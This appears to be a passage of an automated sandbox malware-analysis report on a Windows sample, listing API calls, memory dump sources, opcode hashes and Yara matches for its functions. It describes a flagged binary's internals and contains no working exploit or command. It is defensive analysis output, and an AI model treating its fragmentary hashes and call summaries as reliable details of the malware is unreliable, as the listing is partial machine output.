                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                • String ID:
                                                                                • API String ID: 3136044242-0
                                                                                • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                                                • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                                                • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                                                • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                                                • Instruction ID: 54cec943bd09dcb00d1e415c4998b77d12b3387c5f97587b3f5c2d953b93fd55
                                                                                • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                                                • Instruction Fuzzy Hash: 48F06272705210B78725DF5CF886F2673D9FB00720BA4C819F508E7582CB35F8A28665
                                                                                APIs
                                                                                • _free.LIBCMT ref: 04B57260
                                                                                  • Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
                                                                                  • Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51
                                                                                • _free.LIBCMT ref: 04B57272
                                                                                • _free.LIBCMT ref: 04B57284
                                                                                • _free.LIBCMT ref: 04B57296
                                                                                • _free.LIBCMT ref: 04B572A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                                                • Instruction ID: 483566ea0ef53b89664ed2dd7fd9b40260e4331b71de85a4830a2d39d41bba32
                                                                                • Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
                                                                                • Instruction Fuzzy Hash: CEF04432B142146BCA34DB58F586E16B3DDEB01720BA40885FC28D7560CF25FC914A54
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00416FF9
                                                                                  • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                                  • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                                • _free.LIBCMT ref: 0041700B
                                                                                • _free.LIBCMT ref: 0041701D
                                                                                • _free.LIBCMT ref: 0041702F
                                                                                • _free.LIBCMT ref: 00417041
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                                                • Instruction ID: 1bbc7c59558bdb80d40cd5d769ae83ba842cf1fe79b15496f27bd1d3c69b9f62
                                                                                • Opcode Fuzzy Hash: e9905c8b19ab3d426ab646f49b16c807e4d2b9b7b2a9eaa828597b4964810506
                                                                                • Instruction Fuzzy Hash: 2AF04432705240678534DB5DE486D967BE9AF44760758481BF508D7A12D73CFCD0465C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: O*$rB$rB
                                                                                • API String ID: 0-546290271
                                                                                • Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                                                • Instruction ID: b76375a6d1ccb6514fecc0a490c549058fda5aaf315fa6300b765a8ff46226aa
                                                                                • Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
                                                                                • Instruction Fuzzy Hash: 52121771D002489BEB18EBB8DC54BEDB7B4EF95308F1080E8E54567191EF34BA49EB61
                                                                                APIs
                                                                                  • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                                                  • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                                                • __Init_thread_footer.LIBCMT ref: 04B451B2
                                                                                  • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                                                  • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                                                • Sleep.KERNEL32(000007D0), ref: 04B4552A
                                                                                • Sleep.KERNEL32(000007D0), ref: 04B45544
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                                                • String ID: updateSW
                                                                                • API String ID: 500923978-2484434887
                                                                                • Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                                                • Instruction ID: c6fd249a583e1bd64c1d0d5cf636f5f3d56e5160116afebae93ef7f49f3738a4
                                                                                • Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
                                                                                • Instruction Fuzzy Hash: CED1D4B1A005649BEB38DB28CC887ADB771EFC1308F1441E9D9096B295DB75AEC4DB41
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _strrchr
                                                                                • String ID:
                                                                                • API String ID: 3213747228-0
                                                                                • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                                                • Instruction ID: 69c86d9ac2cbcabf67793ed5a3a3d409a27c6f7a9974910ead7e1ab8c51a9ea7
                                                                                • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                                                • Instruction Fuzzy Hash: 48B12532A002469FEB21CF28C8807EEBBF5FF55344F14C56AD8559B381E636A942CB60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strrchr
                                                                                • String ID:
                                                                                • API String ID: 3213747228-0
                                                                                • Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                                                • Instruction ID: 02a552d982c9984a1b1bac77fe61ae331d2408373eee9c2b43d7e4130cbb2361
                                                                                • Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
                                                                                • Instruction Fuzzy Hash: 1FB11532A062869FEB19CF28C8807BEFBF5EF45340F1445E9DC549B2A1D634A902CF60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: _strrchr
                                                                                • String ID:
                                                                                • API String ID: 3213747228-0
                                                                                • Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                                                • Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
                                                                                • Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
                                                                                • Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68
                                                                                APIs
                                                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41B6C
                                                                                • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41B8B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileInternet$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 3197321146-0
                                                                                • Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                                                • Instruction ID: 38f03f2f50ce7fb5e1d488fa682dcfb14914d823c11f0e815f3cc0a36ff6d32e
                                                                                • Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
                                                                                • Instruction Fuzzy Hash: 96C16EB0A002189FEB25CF28CD88BEAB7B5FF89704F1045D8E509A7690D775BA85CF50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustPointer
                                                                                • String ID:
                                                                                • API String ID: 1740715915-0
                                                                                • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                                                • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                                                                • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                                                                • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_3_4cf0000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustPointer
                                                                                • String ID:
                                                                                • API String ID: 1740715915-0
                                                                                • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                                • Instruction ID: 96e02adebae30f45631e36f17cd4e2790953f2bb6f2a3d0f583c6d7f4dfadc9d
                                                                                • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                                • Instruction Fuzzy Hash: EF51BF727012029FEBA99F55DC40BBAF7A7EF44314F14412DEA0946290E73BF985D790
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustPointer
                                                                                • String ID:
                                                                                • API String ID: 1740715915-0
                                                                                • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                                • Instruction ID: f0bc5704de4a8aec523d52425b52e3bee8f4acdc25eac687b52e62684058ebf2
                                                                                • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                                • Instruction Fuzzy Hash: CE51E372A08602AFEF298F10D880B7A7BA4FF84304F1445ADDA4597A90E731F951FB91
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustPointer
                                                                                • String ID:
                                                                                • API String ID: 1740715915-0
                                                                                • Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                                • Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
                                                                                • Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
                                                                                • Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A
                                                                                APIs
                                                                                  • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                                                • GetLastError.KERNEL32 ref: 10007C36
                                                                                • __dosmaperr.LIBCMT ref: 10007C3D
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                                                • __dosmaperr.LIBCMT ref: 10007C83
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1913693674-0
                                                                                • Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                                                • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                                                                • Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                                                                • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                                                                APIs
                                                                                  • Part of subcall function 04B4FE6F: _free.LIBCMT ref: 04B4FE7D
                                                                                  • Part of subcall function 04B5375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B588CA,?,?,?,00000000,?,04B58639,0000FDE9,00000000,?), ref: 04B53800
                                                                                • GetLastError.KERNEL32 ref: 04B55D18
                                                                                • __dosmaperr.LIBCMT ref: 04B55D1F
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B55D5E
                                                                                • __dosmaperr.LIBCMT ref: 04B55D65
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                • String ID:
                                                                                • API String ID: 167067550-0
                                                                                • Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                                                • Instruction ID: 08308f1979cd23a2967e901f9ccb00e7a8daaa7dba466098c2f7cb83c5f6d14b
                                                                                • Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
                                                                                • Instruction Fuzzy Hash: 9821D872600605BFEB30AF65CC84F6BF7ACEF402697004598ED29975A0E731FD009750
                                                                                APIs
                                                                                  • Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16
                                                                                  • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599
                                                                                • GetLastError.KERNEL32 ref: 00415AB1
                                                                                • __dosmaperr.LIBCMT ref: 00415AB8
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
                                                                                • __dosmaperr.LIBCMT ref: 00415AFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                • String ID:
                                                                                • API String ID: 167067550-0
                                                                                • Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                                                • Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
                                                                                • Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
                                                                                • Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                                                • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                                                • Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                                                                • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                                • Instruction ID: ad62378e5a4cb657ef427a22b8bffecd54b32d2b315963f5834abef0fb0ddb65
                                                                                • Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
                                                                                • Instruction Fuzzy Hash: 7121D871F01221BBDB318B2C9C84B5AB764EF417A0F150DA1ED06A72B0EA30FD01D6E4
                                                                                APIs
                                                                                • GetLastError.KERNEL32(04B4213F,?,04B42143,04B4C610,?,04B4213F,0041D0A0,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51469
                                                                                • _free.LIBCMT ref: 04B514C6
                                                                                • _free.LIBCMT ref: 04B514FC
                                                                                • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51507
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                • Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                                                • Instruction ID: 83c9c325586f02c49b688f083690531fbb78fc7f4d2aeebf1767d39968b0b31e
                                                                                • Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
                                                                                • Instruction Fuzzy Hash: BF11C232F012043BE7222BBCAC85F3AA659CBC1278B6456F4FD24961F0EB25AC129915
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,74DEDF80,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 00411202
                                                                                • _free.LIBCMT ref: 0041125F
                                                                                • _free.LIBCMT ref: 00411295
                                                                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,74DEDF80,00000000,00000000,00401ED8), ref: 004112A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                • Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                                                • Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
                                                                                • Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
                                                                                • Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,?,04B4C5A5,04B52748,?,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?), ref: 04B515C0
                                                                                • _free.LIBCMT ref: 04B5161D
                                                                                • _free.LIBCMT ref: 04B51653
                                                                                • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?,?), ref: 04B5165E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                                                • Instruction ID: 67b24782ee60f7b0215e44da9312ff3ebd04ff82c535b599612bba0dd6aeb964
                                                                                • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                                                • Instruction Fuzzy Hash: 6D11E536F012002BE72267BD7C85F3AA25ADBC5278BA903F5FD24921F0DB75AC119515
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                                                                • _free.LIBCMT ref: 004113B6
                                                                                • _free.LIBCMT ref: 004113EC
                                                                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast_free
                                                                                • String ID:
                                                                                • API String ID: 2283115069-0
                                                                                • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                                                • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                                                                • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                                                • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,04B4C13F,?,?,0042B000,00000000,?,04B4C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B4C10E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                                • Instruction ID: fc2cc1ff71d54b07b6cac171b20c902f5989dabbeed35ce056e4c10f738151fd
                                                                                • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                                                • Instruction Fuzzy Hash: B811E731A42221ABDB224F699C45B9D3B74EF46FA0F1241A0FE01B7380D770F90096D8
                                                                                APIs
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CFA1C0
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CFA1D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000003.1769038956.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
